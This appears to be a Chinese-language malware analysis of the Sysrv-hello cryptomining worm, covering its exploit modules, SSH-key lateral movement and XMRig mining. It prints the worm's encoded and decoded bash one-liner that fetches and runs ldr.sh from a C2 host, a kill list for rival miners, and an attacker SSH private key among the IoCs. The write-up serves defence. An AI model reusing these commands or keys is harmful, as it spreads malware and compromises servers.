概述
该样本为Sysrv-hello挖矿样本,目前该病毒家族的漏洞利用模块已达20个。Sysrv-hello家族最早出现
于2020年12月份,至今其版本迭代已数十次,不断的新增攻击模块,是一个新型且十分活跃的家族。
挖矿程序的特征
- 挖矿程序会占用CPU进行超频运算,导致CPU严重损耗,并且影响服务器上的其他应用。
- 挖矿程序还具备蠕虫化特点,当安全边界被突破时,挖矿病毒会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。
- 挖矿程序具有联动作用,在清理过程中会存在处理不及时或清理不干净导致挖矿病毒反复发生、出现恶意脚本替换系统命令的现象,从而导致执行系统命令时触发恶意脚本执行(例如:xorddos)。因此,需要在挖矿程序的一个执行周期内,尽快将被入侵服务器上的木马程序和持续化后门清理干净,否则容易导致挖矿病毒频繁复发。
样本文件信息
该样本为公司样本,故不提供相关特征。
技术分析
该样本使用随机IP对其进行端口扫描,如果端口开放则进行漏洞攻击
![2022-10-28T10:04:34.png 2022-10-28T10:04:34.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
漏洞利用模块列表
![2022-10-28T10:04:53.png 2022-10-28T10:04:53.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
JBOOS反序列化漏洞
![2022-10-28T10:05:22.png 2022-10-28T10:05:22.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Supervisord远程命令执行漏洞(CVE-2017-11610)利用模块:
![2022-10-28T10:05:37.png 2022-10-28T10:05:37.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Laravel Debug mode RCE(CVE_2021_3129)漏洞利用模块:
![2022-10-28T10:05:54.png 2022-10-28T10:05:54.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Confluence RCE(CVE-2019-3396)漏洞利用模块:
![2022-10-28T10:06:14.png 2022-10-28T10:06:14.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Phpunit RCE(CVE-2017-9841)漏洞利用模块:
![2022-10-28T10:06:29.png 2022-10-28T10:06:29.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
struts2-s2-045 RCE(CVE-2017-5638)漏洞利用模块:
![2022-10-28T10:06:44.png 2022-10-28T10:06:44.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Jenkins RCE CVE-2018-1000861漏洞利用模块:
![2022-10-28T10:07:01.png 2022-10-28T10:07:01.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Jupyter未授权访问漏洞利用模块:
![2022-10-28T10:07:26.png 2022-10-28T10:07:26.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Nexus Repository Manager 3 RCE(CVE-2019-7238)漏洞利用模块:
![2022-10-28T10:07:46.png 2022-10-28T10:07:46.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Tomcat 弱口令爆破模块:
![2022-10-28T10:08:09.png 2022-10-28T10:08:09.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
WordPress暴力破解:
![2022-10-28T10:08:28.png 2022-10-28T10:08:28.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
XXL-JOB executor 未授权访问漏洞利用模块:
![2022-10-28T10:08:46.png 2022-10-28T10:08:46.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Hadoop YARN REST API未授权漏洞利用:
![2022-10-28T10:09:04.png 2022-10-28T10:09:04.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
ThinkPHP5 RCE漏洞利用模块:
![2022-10-28T10:09:20.png 2022-10-28T10:09:20.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
WebLogic RCE (CVE-2020-14882)漏洞利用模块:
![2022-10-28T10:09:44.png 2022-10-28T10:09:44.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Redis未授权写漏洞利用模块:
![2022-10-28T10:10:04.png 2022-10-28T10:10:04.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
SSH爆破:
![2022-10-28T10:10:33.png 2022-10-28T10:10:33.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
PostgreSQL RCE(CVE-2019-9193)漏洞利用模块:
![2022-10-28T10:10:48.png 2022-10-28T10:10:48.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
Spring Cloud Gateway Actuator RCE漏洞(CVE-2022-22947)
![2022-10-28T10:12:19.png 2022-10-28T10:12:19.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
病毒传播方式
利用服务器SSH密匙进行横向移动。
下载恶意主脚本ldr.sh
横向传播模块sys.x86_64运行后还会执行如下base64编码的shell命令,以下载恶意主脚本ldr.sh,从而
实现持久化控制。
1 2 3 4 5
| bash -c {echo,KGN1cmwgMTk0LjE0NS4yMjcuMjEvbGRyLnNoP2UzOWRjMnx8Y3VybCAxOTQuMTQ1LjIyNy4yMS 9sZHIuc2g/ZTM5ZGMyfHxjdXJsIC1xxxxxxxxxxxxxxxI3LjIxL2xkci5zaD9lMzlkYzJ8fGN1cmwgLW sgMTk0LjE0NS4yMjcuxxxxxxxxxxxxxxxxRjMnx8d2dldCAtcSAtTy0gMTk0LjE0NS4yMjcuMjEvbG RyLnNoP2UzOWRjMil8c2ggMT4vZGV2L251bGwgMj4mMSAm}{base64,-d}{bash,-i}t
|
解密后内容如下:
1 2 3
| bash -c {echo,(curl 194.145.xx.xx/ldr.sh?e39dc2curl 194.145.xx.xx/ldr.sh? e39dc2curl -k 194.145.xx.xx/ldr.sh?e39dc2curl -k 194.145.xx.xx/ldr.sh? e39dc2wget -q -O- 194.145.xx.xx/ldr.sh?e39dc2)sh 1>/dev/null 2>&1 &}
|
主要功能为如下几点:
1、关闭防火墙
![2022-10-28T10:13:55.png 2022-10-28T10:13:55.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
2、结束下列进程
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69
| pkill -9 -f b64decode pkill -9 -f MCf8 pkill -9 -f mysqldd pkill -9 -f monero pkill -9 -f kinsing pkill -9 -f sshpass pkill -9 -f sshexec pkill -9 -f cnrig pkill -9 -f attack pkill -9 -f dovecat pkill -9 -f javae pkill -9 -f donate pkill -9 -f 'scan\.log' pkill -9 -f xmr-stak pkill -9 -f crond64 pkill -9 -f stratum pkill -9 -f /tmp/java pkill -9 -f pastebin pkill -9 -f '/tmp/\.' pkill -9 -f 'so\.txt' pkill -9 -f 'bash -s 3673' pkill -9 -f 8005/cc5 pkill -9 -f /tmp/system pkill -9 -f '\./cliented' pkill -9 -f '\.inis' pkill -9 -f certutil pkill -9 -f excludefile pkill -9 -f agettyd pkill -9 -f kthreaddkk pkill -9 -f /dev/shm pkill -9 -f /var/tmp pkill -9 -f '\./python' pkill -9 -f '\./crun' pkill -9 -f 'bash -s kthreaddk' pkill -9 -f '\./\.' pkill -9 -f '118/cf\.sh' pkill -9 -f '\./lin64' pkill -9 -f 'confluence/install\.sh' pkill -9 -f 'unls64\.sh' pkill -9 -f '\./system-xfwm4-session' pkill -9 -f '\./httpd' pkill -9 -f xmrig pkill -9 -f kthreaddi pkill -9 -f loligang pkill -9 '\.6379' pkill -9 'load\.sh' pkill -9 'init\.sh' pkill -9 'solr\.sh' pkill -9 '\.rsyslogds' pkill -9 sysDworker pkill -9 pnscan pkill -9 masscan pkill -9 juiceSSH pkill -9 sysguard pkill -9 kdevtmpfsi pkill -9 solrd pkill -9 polska pkill -9 meminitsrv pkill -9 networkservice pkill -9 sysupdate pkill -9 phpguard pkill -9 phpupdate pkill -9 networkmanager pkill -9 knthread pkill -9 mysqlserver pkill -9 gitlabkill pkill -9 watchbog pkill -9 bashirc pkill -9 zgrab
|
3、/proc目录下保留kthreaddk进程,清理掉其他两种情况的进程
![2022-10-28T10:15:01.png 2022-10-28T10:15:01.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
4、强制卸载阿里云盾(安骑士)
![2022-10-28T10:15:15.png 2022-10-28T10:15:15.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
5、结束自身老版本病毒的进程,判断是否有进程kthreaddk。如果没有则下载最
新版本
![2022-10-28T10:15:26.png 2022-10-28T10:15:26.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
6、利用服务器SSH密钥进行横向移动
![2022-10-28T10:15:40.png 2022-10-28T10:15:40.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
XMRig挖矿
主程序运行后样本会创建守护线程(go routine)来守护矿机进程和文件,再将XMRig挖矿程序释放后
重命名为kthreaddk,以及挖矿配置文件config.json进行挖矿。
同时,为了增强挖矿活动隐蔽性,门罗币挖矿程序在被加载到内存后会被横向传播模块删除(挖矿进程
若被kill掉,会由横向传播模块重新释放)。
矿池地址为:194.145.xx.xx:5443,矿池与C2地址一致,并且本地配置和抓包都没有看到钱包地址,
因此推测此版本使用的是病毒作者自建的矿池。
![2022-10-28T10:22:02.png 2022-10-28T10:22:02.png](https://pan.pigeoooon.cool/d/imgs/blog/loading.gif)
IoCs
IP: 194.145.xx.xx
矿池:194.145.xx.xx:5443
Url
1 2
| http://194.145.xx.xx/ldr.sh http://194.145.xx.xx/sys.x86_64
|
MD5
文件名
备注
5EA36231B6xxxxx5491BE4
ldr.sh
恶意主脚本
35ABF3204E5A2xxxxxA5AB9B19582
sys.x86_64
Linux版横向传播模块
ssh公钥
1 2 3 4 5 6
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaR3U1flcG9SHro9t6G8jRQsUR5ozQjsgx7x30UTwcxnrbk74L IHeTBTNZ3nak2JeqEmT85xxxxxxxxxxxXyZMNkjWsbnPuk0yzQ7i33hlLdrDeO9+XUV duIjfbMtrsSjg1Sk7GG9jTDi7xxxxxxxxxxxxxxxxxxxxxxxFCHzY93o6g2rHtkXEpgZ5qOZeMMONvC z6aUlesOWsrYA9xE6zlgvaq/kmHyZr/HmxdA9moMd+yPrZfG055VWSRT9ijv4XCRrunXZvg7pZtI+kJs L/P7eW9/mkA9Z3TucP2buHy/TBFgyywZT1Etwppzz1nzTIKEGNs9
|
openssh私钥
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
| -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA2kd1NX5XBvUh66PbehvI0ULFEeaM0I7IMe8d9FE8HMZ625O+CyB3 kwUzWd52pNiXqhJk/OXcYKNsdi+vJAA09Gj1/QGoIWV8mTDZI1rG5z7pNMs0O4t94ZS3aw 3jvfl1FXbiI3xxxxxxxxxxxxxxxxxxxxxxxxxxxxx5Jh8ma/x5sXQPZqDHfsj62XxtOeVV kkU/Yo7+Fwka7p12b4O6WbSPpCbC/z+3lvf5pAPWd07nD9m7h8v0wRYMssGU9RLcKac89Z 80yChBjbPQAAA8B/rfQef630HgAAAAdzc2gtcnNhAAABAQDaR3U1flcG9SHro9t6G8jRQs UR5ozQjsgx7x30UTwcxnrbk74LIHeTBTNZ3nak2JeqEmT85dxgo2x2L68kADT0aPX9Aagh ZXyZMNkjWsbnPuk0yzQ7i33hlLdrDeO9+XUVduIjfbMtrsSjg1Sk7GG9jTDi7vBQvqHbQe rWu6cycDuQKb8mmFCHzY9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxtI+kJsL/P7eW9/mkA9Z3 TucP2buHy/TBFgyywZT1Etwppzz1nzTIKEGNs9AAAAAwEAAQAAAQBwJhbKjUcZhAkRkPbL HktneO7X66Sd4z5oqXqydKp1/mRRPO9/uAa3uwxPOEWtHLuP3jOU3GUGIfEwJ//Md269xM /eVmOUBRinfLmTuKhJV8FqJp2Hmnvq0wYKMvC4QtstVA+MPKE673iIqolq0yjEwy5C6pD+ a3Otu4h1G6Uj/CKTUDSs72XYqdh3SzGtKwHstrFSBjckJ6g7U98u/mV9vSIMWxBNeHJM1P aj/Yg1azyAcUGWO3zxVFtDbKNwyo6qZVjB0wIMOZq3rMMq7OHIotiutYZHW9W+0gXLgH4A xsQiQuNftmF8WZyLhV4pa3WSEetul1duVEkrsPUfwfoBAAAAgQC4qOdMPYfAkQRKROjIIN MKmx/+oJl5kCe1nErljyA7ZhhX64RZmH2cUPq3ytrLL4IDfCe7jEKeiemW1jtH3x35vsmX ORzPv7z+J3kpWQrWzEv6/Q4vqEBzk7uHi3lUebfDWdVwG0kGvPVWEJO50HodG0MIeiPEWX r5IjCrAEuxBgAAAIEA/hTNaq5WmXwiQfuVq2tTp5GgIYzcmkCZwZ+AsvRXiKT8oTuJtY3P 0Zkgp1qoaN2enE3kikoReZPWA7b2gL9LjZo/v9QQc/7U4hIXP1ZC6xp22r9V08GtHUkNxp mok0Wl4B5LepQx505mB1RGprx79GEYN3nIz6MjHqt039jdevEAAACBANvtcRIDU2ShmQwn LhgZxZWLJIuI+oo686Gs+iHZ3IACrUzqAwsg5kCE7n1l2JX6IhqVQmQlEFAH3PlXsiXy8f LnBwrKLlLLR4q76nebCKMJid0AnPxI8VNnEtCltM9SjR+FTDpRStEQ12iqzxb1vOMyG0NN KlfhEQR66qqhkW0NAAAAA2tAawECAwQFBgc= -----END OPENSSH PRIVATE KEY-----
|